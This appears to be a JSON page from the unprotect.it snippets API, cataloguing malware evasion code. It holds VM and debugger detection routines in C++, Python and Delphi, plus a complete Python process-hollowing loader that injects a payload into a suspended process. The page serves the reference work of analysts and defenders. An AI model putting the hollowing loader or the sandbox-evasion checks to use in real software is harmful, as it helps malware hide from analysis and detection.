GET /api/snippets/?format=api&page=5
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 206,
    "next": null,
    "previous": "https://unprotect.it/api/snippets/?format=api&page=4",
    "results": [
        {
            "id": 8,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/7/?format=api",
            "description": "Source: https://gist.github.com/kooroshh/e4a303368555ea57f04f87e5630147b5",
            "plain_code": "void CheckVM(void)\r\n{\r\n\tunsigned int    a, b;\r\n\r\n\t__try {\r\n\t\t__asm {\r\n\r\n\t\t\t// save register values on the stack\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tpush ecx\r\n\t\t\tpush edx\r\n\r\n\t\t\t// perform fingerprint\r\n\t\t\tmov eax, 'VMXh' // VMware magic value (0x564D5868)\r\n\t\t\tmov ecx, 0Ah // special version cmd (0x0a)\r\n\t\t\tmov dx, 'VX' // special VMware I/O port (0x5658)\r\n\r\n\t\t\tin eax, dx // special I/O cmd\r\n\r\n\t\t\tmov a, ebx // data \r\n\t\t\tmov b, ecx // data (eax gets also modified\r\n\r\n\t\t\t// restore register values from the stack\r\n\t\t\tpop edx\r\n\t\t\tpop ecx\r\n\t\t\tpop ebx\r\n\t\t\tpop eax\r\n\t\t}\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {}\r\n\r\n\tif (a == 'VMXh') { // is the value equal to the VMware magic value?\r\n\t\tprintf(\"Result  : VMware detected\\nVersion : \");\r\n\t\tif (b == 1)\r\n\t\t\tprintf(\"Express\\n\\n\");\r\n\t\telse if (b == 2)\r\n\t\t\tprintf(\"ESX\\n\\n\");\r\n\t\telse if (b == 3)\r\n\t\t\tprintf(\"GSX\\n\\n\");\r\n\t\telse if (b == 4)\r\n\t\t\tprintf(\"Workstation\\n\\n\");\r\n\t\telse\r\n\t\t\tprintf(\"unknown version\\n\\n\");\r\n\t}\r\n\telse\r\n\t\tprintf(\"Result  : Not Detected\\n\\n\");\r\n}"
        },
        {
            "id": 6,
            "language": {
                "id": 3,
                "label": "Python",
                "code_class": "python"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
            "email": "thomas.roccia@microsoft.com",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/34/?format=api",
            "description": "Python snippet to detect the drive size with `GetDiskFreeSpaceExW`",
            "plain_code": "import ctypes\r\nimport math\r\n\r\n# Convert octets\r\ndef convert_size(size_bytes):\r\n    if size_bytes == 0:\r\n        return \"0B\"\r\n    size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n    i = int(math.floor(math.log(size_bytes, 1024)))\r\n    p = math.pow(1024, i)\r\n    s = round(size_bytes / p, 2)\r\n    return \"%s %s\" % (s, size_name[i])\r\n\r\n\r\n# Get disk size with API GetDiskFreeSpaceExW\r\ndef disk_size(path):\r\n    PULARGE_INTEGER = ctypes.POINTER(ctypes.c_ulonglong)\r\n    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\r\n    kernel32.GetDiskFreeSpaceExW.argtypes = (ctypes.c_wchar_p,) + (PULARGE_INTEGER,) * 3\r\n\r\n    _, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), ctypes.c_ulonglong()\r\n    success = kernel32.GetDiskFreeSpaceExW(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))\r\n    size = convert_size(total.value)\r\n    print \"The size of the disk is: \", size\r\n\r\n\r\nif __name__ == '__main__':\r\n    disk_size(\"C:/\")"
        },
        {
            "id": 4,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
            "email": "thomas.roccia@microsoft.com",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/12/?format=api",
            "description": "This is a snippet to detect the most common registry keys created by virtual machines.",
            "plain_code": "#include <iostream>\r\n#include<Windows.h>\r\n#include<stdio.h>\r\n\r\nusing namespace std;\r\n\r\nint reg_value_exist(HKEY hKey, char * regkey_s, char * value_s, char * lookup) {\r\n\tHKEY regkey;\r\n\tLONG ret;\r\n\tDWORD size;\r\n\tchar value[1024];\r\n\r\n\r\n\tif (RegOpenKeyEx(hKey, regkey_s, 0, KEY_READ, &regkey))\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n\t}\r\n\r\n    else\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n    }\r\n}\r\n\r\nint RegistryArtifacts()\r\n{\r\n    HKEY hKey;\r\n\r\n    // list of registry key related virutal machines\r\n    LPCTSTR RegValuePath[] = { \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"SOFTWARE\\\\VMware, Inc.\\\\VMware Tools\",\r\n                               \"HARDWARE\\\\Description\\\\System\",\r\n                               \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enum\",\r\n                               \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\",\r\n                               
\"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\",\r\n                               \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxSF\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\",\r\n                               };\r\n\r\n\r\n    for (int i = 0; i < (sizeof(RegValuePath) / sizeof(LPCWSTR)); i++)\r\n    {\r\n\r\n        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegValuePath[i], 0, KEY_READ, &hKey))\r\n        {\r\n            cout << \" [-] Reg key doesn't exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg key exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n\r\n    }\r\n\r\n    // Check for registry Value\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"VideoBiosVersion\", \"VIRTUALBOX\");\r\n    
reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DESCRIPTION\\\\System\", \"SystemBiosDate\", \"06/23/99\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"QEMU\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"QEMU\");\r\n}\r\n\r\nint main()\r\n{\r\n    RegistryArtifacts();\r\n    return 0;\r\n}"
        },
        {
            "id": 5,
            "language": {
                "id": 3,
                "label": "Python",
                "code_class": "python"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/67/?format=api",
            "description": "Feel free to edit both `fw_debuggers` and `contains_in_title` to extend the search for known debuggers.",
            "plain_code": "import ctypes\r\nimport os\r\n\r\nfrom ctypes.wintypes import BOOL, HWND, LPARAM,\\\r\n                            LPWSTR, INT, MAX_PATH,\\\r\n                            LPDWORD, DWORD, HANDLE,\\\r\n                            HMODULE\r\n\r\n\r\ndef found(description, hwnd):\r\n    \"\"\"\r\n    When a Window handle is found it will output to console several information about spotted process.\r\n    :param description: Description of found object.\r\n    :param hwnd: Handle of found object.\r\n    \"\"\"\r\n    lpdwProcessId = ctypes.c_ulong()\r\n\r\n    output = \"-\" * 60 + \"\\r\\n\"\r\n    output += description + \"\\r\\n\"\r\n    output += \"-\" * 60 + \"\\r\\n\"\r\n\r\n    output += f\"Handle: {hwnd}\\r\\n\"\r\n\r\n    _GetWindowThreadProcessId(hwnd, ctypes.byref(lpdwProcessId))\r\n\r\n    if (lpdwProcessId is not None) and (lpdwProcessId.value > 0):\r\n        PROCESS_QUERY_INFORMATION = 0x0400\r\n        PROCESS_VM_READ = 0x0010\r\n\r\n        procHandle = ctypes.windll.kernel32.OpenProcess(\r\n            PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,\r\n            False,\r\n            lpdwProcessId.value\r\n        )\r\n\r\n        if procHandle > 0:\r\n            output += f\"Process Id: {lpdwProcessId.value}\\r\\n\"\r\n\r\n            lpFilename = ctypes.create_unicode_buffer(MAX_PATH)\r\n\r\n            if _GetModuleFileNameEx(procHandle, 0, lpFilename, MAX_PATH) > 0:\r\n                path, process_name = os.path.split(lpFilename.value)\r\n\r\n                output += f\"Process Name: {process_name}\\r\\n\"\r\n                output += f\"Image Path: {path}\\r\\n\"\r\n\r\n            ctypes.windll.kernel32.CloseHandle(procHandle)\r\n\r\n    output += \"-\" * 60 + \"\\r\\n\\r\\n\"\r\n\r\n    print(output)\r\n\r\n\r\ndef enum_window_proc(hwnd, lparam):\r\n    \"\"\"\r\n    EnumWindows API CallBack\r\n    :param hwnd: Current Window Handle\r\n    :param lparam: Not used in our case\r\n    :return: Always True in our 
case\r\n    \"\"\"\r\n    if hwnd > 0:\r\n        nMaxCount = ctypes.windll.user32.GetWindowTextLengthW(hwnd)+1\r\n\r\n        if nMaxCount > 0:\r\n            lpWindowName = ctypes.create_unicode_buffer(nMaxCount)\r\n\r\n            if _GetWindowText(hwnd, lpWindowName, nMaxCount) > 0:\r\n                for description, in_title in contains_in_title:\r\n                    if in_title in lpWindowName.value:\r\n                        found(description, hwnd)\r\n\r\n    return True\r\n\r\n\r\nif __name__ == '__main__':\r\n    '''\r\n        Description | Window Class Name (lpClassName) | Window Title (lpWindowName)\r\n    '''\r\n    fw_debuggers = [\r\n        (\"OllyDbg\", \"OLLYDBG\", None),\r\n        (\"x64dbg (x64)\", None, \"x64dbg\"),\r\n        (\"x32dbg (x32)\", None, \"x32dbg\"),\r\n        # ......... #\r\n    ]\r\n\r\n    '''\r\n        Description | Text contained in debugger title.\r\n    '''\r\n    contains_in_title = [\r\n        (\"Immunity Debugger\", \"Immunity Debugger\"),\r\n        # ......... 
#\r\n    ]\r\n\r\n    # Define GetWindowThreadProcessId API\r\n    _GetWindowThreadProcessId = ctypes.windll.user32.GetWindowThreadProcessId\r\n\r\n    _GetWindowThreadProcessId.argtypes = HWND, LPDWORD\r\n    _GetWindowThreadProcessId.restype = DWORD\r\n\r\n    # Define GetModuleFileNameEx API\r\n    _GetModuleFileNameEx = ctypes.windll.psapi.GetModuleFileNameExW\r\n    _GetModuleFileNameEx.argtypes = HANDLE, HMODULE, LPWSTR, DWORD\r\n    _GetModuleFileNameEx.restype = DWORD\r\n\r\n    '''\r\n        Search for Debuggers using the FindWindowW API with ClassName /+ WindowName\r\n    '''\r\n    for description, lpClassName, lpWindowName in fw_debuggers:\r\n        handle = ctypes.windll.user32.FindWindowW(lpClassName, lpWindowName)\r\n\r\n        if handle > 0:\r\n            found(description, handle)\r\n\r\n    '''\r\n        Search for Debuggers using EnumWindows API.\r\n        We first list all Windows titles then search for a debugger title pattern.\r\n        This is useful against debuggers or tools without specific title / classname. \r\n    '''\r\n\r\n    # Define EnumWindows API\r\n    lpEnumFunc = ctypes.WINFUNCTYPE(\r\n        BOOL,\r\n        HWND,\r\n        LPARAM\r\n    )\r\n\r\n    _EnumWindows = ctypes.windll.user32.EnumWindows\r\n\r\n    _EnumWindows.argtypes = [\r\n        lpEnumFunc,\r\n        LPARAM\r\n    ]\r\n\r\n    # Define GetWindowTextW API\r\n    _GetWindowText = ctypes.windll.user32.GetWindowTextW\r\n\r\n    _GetWindowText.argtypes = HWND, LPWSTR, INT\r\n    _GetWindowText.restype = INT\r\n\r\n    # Enumerate Windows through Windows API\r\n    _EnumWindows(lpEnumFunc(enum_window_proc), 0)"
        },
        {
            "id": 3,
            "language": {
                "id": 3,
                "label": "Python",
                "code_class": "python"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/88/?format=api",
            "description": "",
            "plain_code": "# Source: https://github.com/joren485/HollowProcess\r\nfrom ctypes import *\r\nfrom pefile import PE\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n        print \"Example: runpe.py test.exe C:\\windows\\system32\\svchost.exe\"\r\n        sys.exit()\r\n\r\n\r\npayload_exe = sys.argv[1]\r\ntarget_exe = sys.argv[2]\r\nstepcount = 1\r\n\r\n\r\nclass PROCESS_INFORMATION(Structure):\r\n\t_fields_ = [\r\n                ('hProcess', c_void_p), \r\n                ('hThread', c_void_p), \r\n                ('dwProcessId', c_ulong), \r\n                ('dwThreadId', c_ulong)]\r\n\t\r\nclass STARTUPINFO(Structure):\r\n\t_fields_ = [\r\n                ('cb', c_ulong), \r\n                ('lpReserved', c_char_p),    \r\n                ('lpDesktop', c_char_p),\r\n                ('lpTitle', c_char_p),\r\n                ('dwX', c_ulong),\r\n                ('dwY', c_ulong),\r\n                ('dwXSize', c_ulong),\r\n                ('dwYSize', c_ulong),\r\n                ('dwXCountChars', c_ulong),\r\n                ('dwYCountChars', c_ulong),\r\n                ('dwFillAttribute', c_ulong),\r\n                ('dwFlags', c_ulong),\r\n                ('wShowWindow', c_ushort),\r\n                ('cbReserved2', c_ushort),\r\n                ('lpReserved2', c_ulong),    \r\n                ('hStdInput', c_void_p),\r\n                ('hStdOutput', c_void_p),\r\n                ('hStdError', c_void_p)]\r\n\t\r\nclass FLOATING_SAVE_AREA(Structure):\r\n\t_fields_ = [\r\n                (\"ControlWord\", c_ulong),\r\n                (\"StatusWord\", c_ulong),\r\n                (\"TagWord\", c_ulong),\r\n                (\"ErrorOffset\", c_ulong),\r\n                (\"ErrorSelector\", c_ulong),\r\n                (\"DataOffset\", c_ulong),\r\n                (\"DataSelector\", c_ulong),\r\n                (\"RegisterArea\", c_ubyte * 80),\r\n                (\"Cr0NpxState\", c_ulong)]\t\r\n\t\r\nclass CONTEXT(Structure):\r\n        _fields_ = 
[\r\n                (\"ContextFlags\", c_ulong),\r\n                (\"Dr0\", c_ulong),\r\n                (\"Dr1\", c_ulong),\r\n                (\"Dr2\", c_ulong),\r\n                (\"Dr3\", c_ulong),\r\n                (\"Dr6\", c_ulong),\r\n                (\"Dr7\", c_ulong),\r\n                (\"FloatSave\", FLOATING_SAVE_AREA),\r\n                (\"SegGs\", c_ulong),\r\n                (\"SegFs\", c_ulong),\r\n                (\"SegEs\", c_ulong),\r\n                (\"SegDs\", c_ulong),\r\n                (\"Edi\", c_ulong),\r\n                (\"Esi\", c_ulong),\r\n                (\"Ebx\", c_ulong),\r\n                (\"Edx\", c_ulong),\r\n                (\"Ecx\", c_ulong),\r\n                (\"Eax\", c_ulong),\r\n                (\"Ebp\", c_ulong),\r\n                (\"Eip\", c_ulong),\r\n                (\"SegCs\", c_ulong),\r\n                (\"EFlags\", c_ulong),\r\n                (\"Esp\", c_ulong),\r\n                (\"SegSs\", c_ulong),\r\n                (\"ExtendedRegisters\", c_ubyte * 512)]\r\n\r\ndef error():\r\n        print \"[!]Error: \" + FormatError(GetLastError())\r\n        print \"[!]Exiting\"\r\n        print \"[!]The process may still be running\"\r\n        sys.exit()\r\n        \r\n\r\nprint \"[\" + str(stepcount) +\"]Creating Suspended Process\"\r\nstepcount += 1\r\n\r\nstartupinfo = STARTUPINFO()\r\nstartupinfo.cb = sizeof(STARTUPINFO)\r\nprocessinfo = PROCESS_INFORMATION()\r\n\r\nCREATE_SUSPENDED = 0x0004\r\nif windll.kernel32.CreateProcessA(\r\n                                None,\r\n                                target_exe,\r\n                                None,\r\n                                None,\r\n                                False,\r\n                                CREATE_SUSPENDED,\r\n                                None,\r\n                                None,\r\n                                byref(startupinfo),\r\n                                byref(processinfo)) == 0:\r\n       error()\r\n 
       \r\n\r\nhProcess = processinfo.hProcess\r\nhThread = processinfo.hThread\r\n\r\n\r\nprint \"\\t[+]Successfully created suspended process! PID: \" + str(processinfo.dwProcessId)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Reading Payload PE file\"\r\nstepcount += 1\r\n\r\nFile = open(payload_exe,\"rb\")\r\npayload_data = File.read()\r\nFile.close()\r\npayload_size = len(payload_data)\r\n\r\nprint \"\\t[+]Payload size: \" + str(payload_size)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Extracting the necessary info from the payload data.\"\r\nstepcount += 1\r\n\r\npayload = PE(data = payload_data)\r\npayload_ImageBase = payload.OPTIONAL_HEADER.ImageBase\r\npayload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage\r\npayload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders\r\npayload_sections = payload.sections\r\npayload_NumberOfSections = payload.FILE_HEADER.NumberOfSections\r\npayload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint\r\npayload.close()\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_READWRITE = 0x4\r\n\r\npayload_data_pointer = windll.kernel32.VirtualAlloc(None,\r\n                                c_int(payload_size+1),\r\n                                MEM_COMMIT | MEM_RESERVE,\r\n                                PAGE_READWRITE)\r\n\r\n\r\nmemmove(                        payload_data_pointer,\r\n                                payload_data,\r\n                                payload_size)\r\n\r\nprint \"\\t[+]Data from the PE Header: \"\r\nprint \"\\t[+]Image Base Address: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Address of EntryPoint: \" + str(hex(payload_AddressOfEntryPoint))\r\nprint \"\\t[+]Size of Image: \" + str(payload_SizeOfImage)\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_data_pointer))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Context\"\r\ncx = CONTEXT()\r\ncx.ContextFlags = 0x10007\r\n\r\nif windll.kernel32.GetThreadContext(hThread, byref(cx)) == 0:\r\n       
  error()\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Image Base Address from target\"\r\nstepcount += 1\r\n\r\nbase = c_int(0)\r\nwindll.kernel32.ReadProcessMemory(hProcess, c_char_p(cx.Ebx+8), byref(base), sizeof(c_void_p),None)\r\ntarget_PEBaddress = base\r\nprint \"\\t[+]PEB address: \" + str(hex(target_PEBaddress.value))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Unmapping\"\r\nif target_PEBaddress ==  payload_ImageBase:\r\n        if not windll.ntdll.NtUnmapViewOfSection(\r\n                                hProcess,\r\n                                target_ImageBase):\r\n                error()\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Allocation memory\"\r\nstepcount += 1\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_EXECUTE_READWRITE = 0x40\r\n\r\naddress = windll.kernel32.VirtualAllocEx(\r\n                                hProcess, \r\n                                c_char_p(payload_ImageBase), \r\n                                c_int(payload_SizeOfImage), \r\n                                MEM_COMMIT|MEM_RESERVE, \r\n                                PAGE_EXECUTE_READWRITE)\r\n\r\nif address == 0:\r\n        error()\r\n\r\nprint \"\\t[+]Allocated to: \"+ str(hex(address))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Writing Headers\"\r\nstepcount += 1\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\n\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(payload_ImageBase),\r\n                                c_char_p(payload_data_pointer),\r\n                                c_int(payload_SizeOfHeaders),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                error()\r\n\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer))\r\nprint \"\\t[+]Size of data: \" + 
str(hex(payload_SizeOfHeaders))\r\n\r\nprint\r\nfor i in range(payload_NumberOfSections):\r\n        section = payload_sections[i]\r\n        dst = payload_ImageBase + section.VirtualAddress\r\n        src = payload_data_pointer + section.PointerToRawData\r\n        size = section.SizeOfRawData\r\n        print\r\n        print \"[\" + str(stepcount) +\"]Writing section: \" + section.Name\r\n        stepcount += 1\r\n        print \"\\t[+]Pointer to data: \" + str(hex(src))\r\n        print \"\\t[+]Writing to: \" + str(hex(dst))\r\n        print \"\\t[+]Size of data: \" + str(hex(size))\r\n\r\n        lpNumberOfBytesWritten  = c_size_t(0)\r\n\r\n        if windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(dst),\r\n                                c_char_p(src),\r\n                                c_int(size),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                 error()\r\n                 \r\n        print \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n         \r\nprint\r\nprint \"[\" + str(stepcount) +\"]Editing Context\"\r\nstepcount += 1\r\n\r\ncx.Eax = payload_ImageBase + payload_AddressOfEntryPoint\r\n\r\nlpNumberOfBytesWritten  = c_size_t(0)\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(cx.Ebx+8),\r\n                                c_char_p(payload_data_pointer+0x11C),\r\n                                c_int(4),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n         error()\r\n\r\nprint \"\\t[+]Pointer to data: \" + str(hex(cx.Ebx+8))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer+0x11C))\r\nprint \"\\t[+]Size of data: \" + str(hex(4))\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n\r\nprint \r\nprint \"[\" + str(stepcount) +\"]Setting Context\"\r\nstepcount += 
1\r\n\r\nwindll.kernel32.SetThreadContext(\r\n                                hThread,\r\n                                byref(cx))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Resuming Thread\"\r\nstepcount += 1\r\n\r\nif windll.kernel32.ResumeThread(hThread) == 0:\r\n        error()\r\n\r\nprint \"[\" + str(stepcount) +\"]Success\""
        },
        {
            "id": 1,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/61/?format=api",
            "description": "",
            "plain_code": "unit UntPEBDebug;\r\n\r\ninterface\r\n\r\nuses Windows;\r\n\r\nconst PROCESS_QUERY_LIMITED_INFORMATION = $1000;\r\n        PROCESS_BASIC_INFORMATION         = 0;\r\n\r\n// https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nvar _NtQueryInformationProcess : function(\r\n                                            ProcessHandle : THandle;\r\n                                            ProcessInformationClass : DWORD;\r\n                                            ProcessInformation : Pointer;\r\n                                            ProcessInformationLength :\r\n                                            ULONG; ReturnLength : PULONG) : LongInt; stdcall;\r\n\r\n    hNTDLL : THandle;\r\n\r\n\r\n{$IFDEF WIN64}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : Int64;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : Int64;\r\n    BasePriority       : Int64;\r\n    UniqueProcessId    : Int64;\r\n    InheritedUniquePID : Int64;\r\n    end;\r\n{$ELSE}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : DWORD;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : DWORD;\r\n    BasePriority       : DWORD;\r\n    UniqueProcessId    : DWORD;\r\n    InheritedUniquePID : DWORD;\r\n    end;\r\n{$ENDIF}\r\n\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\n\r\nimplementation\r\n\r\n{-------------------------------------------------------------------------------\r\n    Open a process and retrieve the point of debug flag from PEB.\r\n\r\n    If function succeed, don't forget to call close process 
handle.\r\n-------------------------------------------------------------------------------}\r\nfunction GetDebugFlagPointer(AProcessID : Cardinal; var AProcessHandle : THandle) : Pointer;\r\nvar PBI     : TProcessBasicInformation;\r\n    ARetLen : Cardinal;\r\nbegin\r\n    result := nil;\r\n    ///\r\n\r\n    AProcessHandle := 0;\r\n\r\n    if NOT Assigned(_NtQueryInformationProcess) then\r\n    Exit();\r\n    ///\r\n\r\n    AProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_WRITE or PROCESS_VM_READ, false, AProcessID);\r\n    if (AProcessHandle = 0) then\r\n    Exit;\r\n\r\n    if _NtQueryInformationProcess(AProcessHandle, PROCESS_BASIC_INFORMATION, @PBI, sizeOf(TProcessBasicInformation), @ARetLen) = ERROR_SUCCESS then\r\n    result := Pointer(NativeUInt(PBI.PebBaseAddress) + (SizeOf(Byte) * 2))\r\n    else\r\n    CloseHandle(AProcessHandle);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Retrieve the target process debug status from PEB.\r\n\r\n    ADebugStatus = True  : Target process debug flag is set.\r\n    ADebugStatus = False : Target process debug flag is not set.\r\n-------------------------------------------------------------------------------}\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    pDebugFlag       : pByte;\r\n    ABytesRead       : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    getMem(pDebugFlag, sizeOf(Byte));\r\n    try\r\n        if NOT ReadProcessMemory(hProcess, pDebugFlagOffset, pDebugFlag, sizeOf(Byte), ABytesRead) then\r\n        Exit;\r\n\r\n        ///\r\n        ADebugStatus := (pDebugFlag^ = 1);\r\n    finally\r\n        FreeMem(pDebugFlag);\r\n    end;\r\n\r\n  
